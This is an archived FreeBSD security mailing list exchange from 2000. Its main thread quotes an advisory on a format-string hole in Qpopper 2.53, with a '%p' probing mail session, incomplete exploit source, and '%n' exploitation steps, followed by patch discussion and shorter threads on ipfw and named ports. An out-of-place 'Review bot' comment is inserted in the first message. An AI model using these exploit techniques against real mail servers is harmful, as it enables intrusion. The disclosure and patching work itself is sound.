--- Jeremy Shaffner System Administrator JORSM Internet jer@jorsm.com http://www.jorsm.com/~jer/pgp.key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 14:45:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id AD9F937BD9B for ; Wed, 24 May 2000 14:45:35 -0700 (PDT) (envelope-from dv@dv.ru) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with ESMTP id BAA04342; Thu, 25 May 2000 01:45:25 +0400 (MSD) Date: Thu, 25 May 2000 01:45:25 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Jeremy Shaffner Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=KOI8-R Content-Transfer-Encoding: 8BIT Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! This patch doesn't work. popper exits with sig11 when a user sends the UIDL xxx command. Dmitry. On Wed, 24 May 2000, Jeremy Shaffner wrote: > Date: Wed, 24 May 2000 16:40:00 -0500 (CDT) 
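Review bot: the context line `sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));` in this hunk passes `buffer` as both the destination and the first `%s` source, which the C standard leaves undefined for sprintf (overlapping objects), and it is also unbounded; the `"%s"` change on the line below is correct, but this append belongs in a separate array or in an `snprintf(buffer + strlen(buffer), sizeof(buffer) - strlen(buffer), " %d %.128s", mp->length, from_hdr(p, mp))`. It would also help to state in the patch header that `from_hdr()` returns header text supplied by whoever mailed the message, so nobody later reverts the literal `"%s"` as redundant.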
> From: Jeremy Shaffner > To: freebsd-security@FreeBSD.ORG > Subject: QPOPPER: Remote gid mail exploit > > > [Patch is at the end] > > Here is the original advisory. Note that the actual advisory is > correct WRT the file and line numbers. The posts on Bugtraq indicate to > patch pop_msg.c instead of pop_uidl.c. > > > ------>8---------- > > _____________________________________________________________________ > b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5 > > > Advisory Name: Remote shell via Qpopper2.53 > Date: 5/23/00 > Application: Qpopper 2.53 for *NIX > Vendor: Qualcomm Incorporated > WWW: www.qualcomm.com > Severity: can give users remote > shell with gid=mail. > Author: prizm (prizm@resentment.org) > Homepage: b0f.freebsd.lublin.pl > > > * Overview > Qpopper is the most widely-used server for the POP3 protocol. This allows users to > access their mail using any POP3 client. Qpopper supports the latest standards, > and includes a large number of optional features. Qpopper is normally used with > standard UNIX mail transfer and delivery agents such as sendmail or smail. > > > > * The Problem > Yes, Qpop, again and again... > There is a bug in version 2.53 of Qpop that can give you a remote > shell with gid=mail. Problem is with euidl command which uses user input as > format string for pop_msg() function. > Lets examine following code from Qpop 2.53 source: > --> pop_uidl.c, around line 150: > ................ > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > if (nl = index(buffer, NEWLINE)) *nl = 0; > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp)); > ! return (pop_msg (p,POP_SUCCESS, buffer)); > ^^^^^^^^^^^^^ > ................. > Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat, > const char *format,...), and here we have user-input as format string. Lame. > Ok, back to problem, imagine following smtp session: > > MAIL FROM: > 200 Ok > RCPT TO: > 200 Ok > data > 200 Okey, okey. end with "." 
> Subject: still trust qpop?=/ > X-UIDL: AAAAAAAAAAAAAAAA 
> From: %p%p%p%p%p%p%p > > test > . > 200 BLABLABLA Ok, message accepted for delivery. > > Then, luser connects with his pop account and runs euidl command there: > +OK QPOP (version 2.53) at b0f starting. <666.666@b0f> > USER luser > +OK Password required for luser. > PASS secret > +OK luser has 3 messages (1644 octets). > euidl 3 > +OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028 > > Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p > where implemented as arguments for vsnprintf() command. > > * Exploiting > Is this possible? Yeah, sure! > But there are some limits. Qpopper2.53 from FreeBSD ports with patches is > much more difficult to exploit than one from linux. It is because freebsd > patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is > big difference between them. Qpopper with FreeBSD's patches IS exploitable. > > Exploit > ------- > /* qpop_euidl.c exploit by prizm/Buffer0verflow Security > * > * Sample exploit for buffer overflow in Qpopper 2.53. > * This little proggie generates a mail u need to send. > * > * Standard disclaimer applies. > * By the way, exploit is broken =) You need to insert shellcode. > * > * MAD greets to tf8 for pointing out the bug, and all other b0f members. > * greets to USSRLabs and ADM > * check http://b0f.freebsd.lublin.pl/ for news. 
> */ > #include > #include > > char shellcode[]="imnothing"; > int main(int argc, char *argv[]) > { > int i; > unsigned long ra=0; > if(argc!=2) { > fprintf(stderr,"Usage: %s return_addr\n", argv[0]); > exit(0); > } > sscanf(argv[1], "%x", &ra); > if(!ra) > return; > if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { > fprintf(stderr,"Bad shellcode\n"); > exit(0); > } > fprintf(stderr,"return address: 0x%.8x\n", ra); > printf("X-UIDL: "); > for(i=0; i < sizeof(shellcode);i++) > printf("%c", shellcode[i]); > printf("\r\n"); > printf("From: %s", "%.1000d"); > for(i=0; i < 50; i++) > printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24); > printf("@test\r\n"); > printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); > return 0; > } > > Exploiting QPOP from FreeBSD ports > ---------------------------------- > > It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't > overflow stack, but we still have control over it (remeber %n?). > Im not going to post exploit for this because it is really generic, but I > will explain theory on exploiting qpop with vsNprintf. > There is an little trick with %n YOu should know. Try to understand why > folowing code succeeds and prints out 2000, not sizeof(b): > ------ > #include > int main(void){ > int s=1; char b[1024]; int q; > snprintf(b, sizeof(b), "%.2000d%n", 1, &q); > return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES")); > } > ------ > On my box with FreeBSD 3.4 i have: > 2000, overflowed? NO > > Hah, first time i expected to see 1024, but YOu know that all is > unpredictable . So, this little thing will help us a lot. > Exploiting it: > a) Find where in stack is located user input. > b) Compose a message with filed X-UIDL and From: > X-UIDL: ppRETARETARETARETA 
> From: %.RETURNd%n@test > where: > "pp" is for padding (two or three chars) > "RETA" is return address pointing to SHELLCODE > "SHELLCODE" guess > "RETURN" return address > > c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself. > > > > * Vulnerable Versions > 2.53(Others?) > > > * Fix > You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which > is not vulnerable to this problem. > > Or you can manually patch it by doing the following: > > At lines 152 and 62 from pop_uidl.c, replace: > - return (pop_msg (p,POP_SUCCESS, buffer)); > to: > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > > > > copyright © 1999-2000 > prizm, buffer0verfl0w security > b0f.freebsd.lublin.pl > > > ---------->8------------ > > > Here is the resulting patch: > > > ---------8<-------- > > --- pop_uidl.c.orig Wed May 24 15:58:53 2000 > +++ pop_uidl.c Wed May 24 16:21:56 2000 > @@ -59,7 +59,7 @@ > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > if (nl = index(buffer, NEWLINE)) *nl = 0; > - return (pop_msg (p,POP_SUCCESS, buffer)); > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > } > } else { > /* yes, we can do this */ 
> @@ -149,7 +149,7 @@ > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > if (nl = index(buffer, NEWLINE)) *nl = 0; > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, > mp)); > - return (pop_msg (p,POP_SUCCESS, buffer)); > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > } > } else { > /* yes, we can do this */ > > ------->8---------- > > > > --- > Jeremy Shaffner > System Administrator > JORSM Internet > jer@jorsm.com > http://www.jorsm.com/~jer/pgp.key > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 14:52:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (Postfix) with ESMTP id B2A7C37B6F8 for ; Wed, 24 May 2000 14:52:03 -0700 (PDT) (envelope-from jer@jorsm.com) Received: by mercury.jorsm.com (Postfix, from userid 1850) id 0B216E4A1B; Wed, 24 May 2000 16:52:02 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by mercury.jorsm.com (Postfix) with ESMTP id 00CECE0C01; Wed, 24 May 2000 16:52:01 -0500 (CDT) Date: Wed, 24 May 2000 16:52:01 -0500 (CDT) 
From: Jeremy Shaffner To: Dmitry Valdov Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I don't see that happening here: uidl 2 +OK 2 AAAAAAAAAAAAAA euidl 2 +OK 2 AAAAAAAAAAAAAA 481 %p%p%p%p%p%p%p%p@foo.domain.com Without the patch you get the behavior described in the advisory: +OK 2 AAAAAAAAAAAAAA 470 0xbfbfd0340x804fd640xbfbfd0340x1d60x8052e4e0xbfbfd86c0x 80570280x5@foo.domain.com -Jeremy On Thu, 25 May 2000, Dmitry Valdov wrote: > Hi! > > This patch doesn't work. popper exiting with sig11 when user send UIDL xxx > command. > > Dmitry. > > > > Or you can manually patch it by doing the following: > > > > At lines 152 and 62 from pop_uidl.c, replace: > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > to: > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > > > > Here is the resulting patch: > > > > > > ---------8<-------- > > > > --- pop_uidl.c.orig Wed May 24 15:58:53 2000 > > +++ pop_uidl.c Wed May 24 16:21:56 2000 > > @@ -59,7 +59,7 @@ > > > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > } > > } else { > > /* yes, we can do this */ 
> > @@ -149,7 +149,7 @@ > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, > > mp)); > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > } > > } else { > > /* yes, we can do this */ > > > > ------->8---------- > > --- Jeremy Shaffner System Administrator JORSM Internet jer@jorsm.com http://www.jorsm.com/~jer/pgp.key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 15: 0:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id C55E937B6CD for ; Wed, 24 May 2000 15:00:43 -0700 (PDT) (envelope-from dv@dv.ru) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with SMTP id CAA05264; Thu, 25 May 2000 02:00:36 +0400 (MSD) Date: Thu, 25 May 2000 02:00:34 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Jeremy Shaffner Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! oops, sorry. My fault. I've inserted "%s" before PO_SUCCESS, not before "buffer". Sorry again. Dmitry. On Wed, 24 May 2000, Jeremy Shaffner wrote: > Date: Wed, 24 May 2000 16:52:01 -0500 (CDT) 
> From: Jeremy Shaffner > To: Dmitry Valdov > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: QPOPPER: Remote gid mail exploit > > > I don't see that happening here: > > uidl 2 > +OK 2 AAAAAAAAAAAAAA > euidl 2 > +OK 2 AAAAAAAAAAAAAA 481 %p%p%p%p%p%p%p%p@foo.domain.com > > Without the patch you get the behavior described in the advisory: > > +OK 2 AAAAAAAAAAAAAA 470 > 0xbfbfd0340x804fd640xbfbfd0340x1d60x8052e4e0xbfbfd86c0x > 80570280x5@foo.domain.com > > > -Jeremy > > On Thu, 25 May 2000, Dmitry Valdov wrote: > > > Hi! > > > > This patch doesn't work. popper exiting with sig11 when user send UIDL xxx > > command. > > > > Dmitry. > > > > > > > Or you can manually patch it by doing the following: > > > > > > At lines 152 and 62 from pop_uidl.c, replace: > > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > > to: > > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > > > > > > > Here is the resulting patch: > > > > > > > > > ---------8<-------- > > > > > > --- pop_uidl.c.orig Wed May 24 15:58:53 2000 > > > +++ pop_uidl.c Wed May 24 16:21:56 2000 > > > @@ -59,7 +59,7 @@ > > > > > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > } > > > } else { > > > /* yes, we can do this */ 
> > > @@ -149,7 +149,7 @@ > > > sprintf(buffer, "%d %s", msg_id, mp->uidl_str); > > > if (nl = index(buffer, NEWLINE)) *nl = 0; > > > sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, > > > mp)); > > > - return (pop_msg (p,POP_SUCCESS, buffer)); > > > + return (pop_msg (p,POP_SUCCESS, "%s", buffer)); > > > } > > > } else { > > > /* yes, we can do this */ > > > > > > ------->8---------- > > > > > > --- > Jeremy Shaffner > System Administrator > JORSM Internet > jer@jorsm.com > http://www.jorsm.com/~jer/pgp.key > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 15: 4:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from mercury.jorsm.com (mercury.jorsm.com [207.112.128.9]) by hub.freebsd.org (Postfix) with ESMTP id 191E437BCBC for ; Wed, 24 May 2000 15:04:28 -0700 (PDT) (envelope-from jer@jorsm.com) Received: by mercury.jorsm.com (Postfix, from userid 1850) id 3AE17E4A22; Wed, 24 May 2000 17:04:24 -0500 (CDT) Received: from localhost (localhost [127.0.0.1]) by mercury.jorsm.com (Postfix) with ESMTP id 310ADE0C01; Wed, 24 May 2000 17:04:24 -0500 (CDT) Date: Wed, 24 May 2000 17:04:24 -0500 (CDT) 
From: Jeremy Shaffner To: Dmitry Valdov Cc: freebsd-security@FreeBSD.ORG Subject: Re: QPOPPER: Remote gid mail exploit In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org That's what the patch is for. :) On Thu, 25 May 2000, Dmitry Valdov wrote: > Hi! > > oops, sorry. My fault. I've inserted "%s" before PO_SUCCESS, not before > "buffer". > Sorry again. > > Dmitry. > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:19:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (law-f48.hotmail.com [209.185.130.36]) by hub.freebsd.org (Postfix) with SMTP id 9A72B37BAA5 for ; Wed, 24 May 2000 18:19:37 -0700 (PDT) (envelope-from ronnetron@hotmail.com) Received: (qmail 90761 invoked by uid 0); 25 May 2000 01:19:36 -0000 Message-ID: <20000525011936.90760.qmail@hotmail.com> Received: from 63.203.116.218 by www.hotmail.com with HTTP; Wed, 24 May 2000 18:19:35 PDT X-Originating-IP: [63.203.116.218] 
From: "Ron Smith" To: freebsd-ipfw@freebsd.org Cc: freebsd-security@freebsd.org Subject: sunrpc Date: Wed, 24 May 2000 18:19:35 PDT Mime-Version: 1.0 Content-Type: text/plain; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi all,

I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close 'sunrpc' on port 111. I can't seem to find anything specific on how to do that at freebsd.org or in "The Complete FreeBSD" or "Building Internet Firewalls". 'netstat -na' still shows port 111 listening on both 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone point me in the right direction?

TIA
Ron Smith
________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com

From owner-freebsd-security Wed May 24 18:31:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 0040637B6F8; Wed, 24 May 2000 18:31:30 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id SAA26925; Wed, 24 May 2000 18:30:52 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Wed, 24 May 2000 18:30:52 -0700 (PDT)
From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Ron Smith Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc In-Reply-To: <20000525011936.90760.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "sockstat" will help you out... On Wed, 24 May 2000, Ron Smith wrote: > Hi all, > > I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close > 'sunrpc' on port 111. I can't seem to find anything specific on how to do > that at freebsd.org or in "The Complete FreeBSD" or "Building Inernet > Firewalls". 'netstat -na ' still shows port 111 listening on both > 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone > point me in the right direction? > > TIA > Ron Smith > > ________________________________________________________________________ > Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:31:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from nameserver.austclear.com.au (nameserver.austclear.com.au [192.83.119.132]) by hub.freebsd.org (Postfix) with ESMTP id 2831737BBBF; Wed, 24 May 2000 18:31:31 -0700 (PDT) (envelope-from ahl@austclear.com.au) Received: from tungsten.austclear.com.au (tungsten.austclear.com.au [192.168.70.1]) by nameserver.austclear.com.au (8.9.3/8.9.3) with ESMTP id LAA29281; Thu, 25 May 2000 11:31:28 +1000 (EST) Received: from tungsten (tungsten [192.168.70.1]) by tungsten.austclear.com.au (8.9.3/8.9.3) with ESMTP id LAA13772; Thu, 25 May 2000 11:31:27 +1000 (EST) Message-Id: <200005250131.LAA13772@tungsten.austclear.com.au> X-Mailer: exmh 
version 2.1.1 10/15/1999 To: "Ron Smith" Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc In-Reply-To: Your message of "Wed, 24 May 2000 18:19:35 PDT." <20000525011936.90760.qmail@hotmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 25 May 2000 11:31:27 +1000 From: Tony Landells Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org RPC is actually controlled by the portmapper. You can disable it (assuming you have no other services that want it) by setting portmap_enable="NO". Tony To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 18:33:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from usui.sc.newnet.co.uk (usui.sc.newnet.co.uk [212.87.80.10]) by hub.freebsd.org (Postfix) with ESMTP id 0BEC837BC9C; Wed, 24 May 2000 18:33:06 -0700 (PDT) (envelope-from peter@newnet.co.uk) Received: from newnet.co.uk (muktananda.sys.newnet.co.uk [212.87.87.37]) by usui.sc.newnet.co.uk (8.9.3/8.9.3) with ESMTP id CAA05220; Thu, 25 May 2000 02:33:11 +0100 (GMT/BST) Message-ID: <392C82A9.72A4F673@newnet.co.uk> Date: Thu, 25 May 2000 02:32:25 +0100 
From: Peter Coates Organization: South Coast NOC Support Team X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: Ron Smith Cc: freebsd-ipfw@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: sunrpc References: <20000525011936.90760.qmail@hotmail.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Hi Ron,

The following two lines should block traffic to port 111. They should be before any rules which enable traffic.

ipfw add deny tcp from any to any 111
ipfw add deny udp from any to any 111

Regards,
Peter

*********************
http://www.newnet.co.uk
FASTEST ISP in the UK - 100% availability
*********************
Internet Magazine - hosting tests Dec 1999

Ron Smith wrote:
> 
> Hi all,
> 
> I'm running FreeBSD v3.4, and have 'ipfw' in place. I'd like to close
> 'sunrpc' on port 111. I can't seem to find anything specific on how to do
> that at freebsd.org or in "The Complete FreeBSD" or "Building Internet
> Firewalls". 'netstat -na' still shows port 111 listening on both
> 'tcp' and 'udp', even though 'rc.conf' has 'inetd_enable="NO"'. Can anyone
> point me in the right direction?
> 
> TIA
> Ron Smith
> 
> ________________________________________________________________________
> Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com

From owner-freebsd-security Wed May 24 21:57: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from kobold.compt.com (jcicorp-gw.compt.com [207.231.193.3]) by hub.freebsd.org (Postfix) with ESMTP id 83FD737B66E for ; Wed, 24 May 2000 21:56:57 -0700 (PDT) (envelope-from klaus@kobold.compt.com) Date: Thu, 25 May 2000 00:56:53 -0400
From: Klaus Steden To: freebsd-security@freebsd.org Subject: named, and socket bindings Message-ID: <20000525005653.X6137@cthulu.compt.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was playing a bit with 'sockstat' on the FreeBSD 3.4 boxen we have around here that offer name service. On both I noticed something that was, to me, a bit odd. The sockets that named had bound were, as expected, the domain port on all the machine's interfaces, but also, a random high UDP port. I checked two BSDI boxes (4.0) and they don't seem to have the same situation. What gives? Did I miss or forget something obvious? Why would named have to grab a port that's not port 53, unless it was doing a zone transfer (and that doesn't seem to be the case) ... is this a bit of a labour-saving measure, the FreeBSD named pre-allocates a port and uses it for zone transfers the lifetime of the whole named process? I'm curious. Anyone have the answer? thanks, Klaus -- Klaus Steden | Unix Systems Administrator | Command Post Toybox | TODO: http://www.compt.com/ | 1) Learn to use my new Unix account. klaus@compt.com | 2) Learn how to change this list. Phone: (416) 585-9995 x345 | Fax: (416) 979-0428 | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 22:18:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 8FA0E37B66E for ; Wed, 24 May 2000 22:18:05 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 23152 invoked by uid 1000); 25 May 2000 05:17:57 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 May 2000 05:17:57 -0000 Date: Thu, 25 May 2000 00:17:57 -0500 (CDT) 
From: Mike Silbersack To: Klaus Steden Cc: freebsd-security@freebsd.org Subject: Re: named, and socket bindings In-Reply-To: <20000525005653.X6137@cthulu.compt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 25 May 2000, Klaus Steden wrote: > I was playing a bit with 'sockstat' on the FreeBSD 3.4 boxen we have around > here that offer name service. > > On both I noticed something that was, to me, a bit odd. The sockets that named > had bound were, as expected, the domain port on all the machine's interfaces, > but also, a random high UDP port. That's the port it uses as the source port for outgoing queries. Using a port other than 53 makes dns spoofing harder. I assume it changes the port, but I'm not sure at what interval. > I checked two BSDI boxes (4.0) and they don't seem to have the same situation. > What gives? Either they're running an old version of bind, or the option in named.conf to explicitly set the source port to 53 at all times has been enabled. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 24 23:25:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 1D89237B706 for ; Wed, 24 May 2000 23:25:32 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id XAA68670; Wed, 24 May 2000 23:25:16 -0700 (PDT) (envelope-from freebsd) 
From: "Rodney W. Grimes" Message-Id: <200005250625.XAA68670@gndrsh.dnsmgr.net> Subject: Re: named, and socket bindings In-Reply-To: <20000525005653.X6137@cthulu.compt.com> from Klaus Steden at "May 25, 2000 00:56:53 am" To: klaus@compt.com (Klaus Steden) Date: Wed, 24 May 2000 23:25:15 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

The newer version of bind does not have to use port 53 for outbound queries, so it opens a high port for this. You can turn this off with

options {
	query-source address * port 53;
};

You can even force it to always use a specific IP address, which is great for named running behind firewalls/filter routers.

> I was playing a bit with 'sockstat' on the FreeBSD 3.4 boxen we have around
> here that offer name service.
> 
> On both I noticed something that was, to me, a bit odd. The sockets that named
> had bound were, as expected, the domain port on all the machine's interfaces,
> but also, a random high UDP port.
> 
> I checked two BSDI boxes (4.0) and they don't seem to have the same situation.
> What gives?
> 
> Did I miss or forget something obvious? Why would named have to grab a port
> that's not port 53, unless it was doing a zone transfer (and that doesn't seem
> to be the case) ... is this a bit of a labour-saving measure, the FreeBSD named
> pre-allocates a port and uses it for zone transfers the lifetime of the whole
> named process?
> 
> I'm curious.
> 
> Anyone have the answer?
> 
> thanks,
> Klaus
> 
> --
> Klaus Steden                  |
> Unix Systems Administrator    |
> Command Post Toybox           | TODO:
> http://www.compt.com/         | 1) Learn to use my new Unix account.
> klaus@compt.com               | 2) Learn how to change this list.
> Phone: (416) 585-9995 x345 | > Fax: (416) 979-0428 | > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 25 0: 4:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id A389137B9D9 for ; Thu, 25 May 2000 00:04:16 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 7265 invoked from network); 25 May 2000 07:00:14 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 25 May 2000 07:00:14 -0000 To: freebsd-security@freebsd.org Subject: Re: QPOPPER: Remote gid mail exploit From: sen_ml@eccosys.com In-Reply-To: References: X-Mailer: Mew version 1.94.1 on Emacs 20.6 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20000525160410I.1001@eccosys.com> Date: Thu, 25 May 2000 16:04:10 +0900 X-Dispatcher: imput version 20000228(IM140) Lines: 14 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org 
From: Jeremy Shaffner Subject: QPOPPER: Remote gid mail exploit Date: Wed, 24 May 2000 16:40:00 -0500 (CDT) Message-ID:

> [Patch is at the end]
> 
> Here is the original advisory. Note that the actual advisory is
> correct WRT the file and line numbers. The posts on Bugtraq indicate to
> patch pop_msg.c instead of pop_uidl.c.

While patching and restarting a qpopper server locally, I started wondering... how much of a problem is this on a FreeBSD system where /var/mail or /var/spool/mail is not setgid mail?

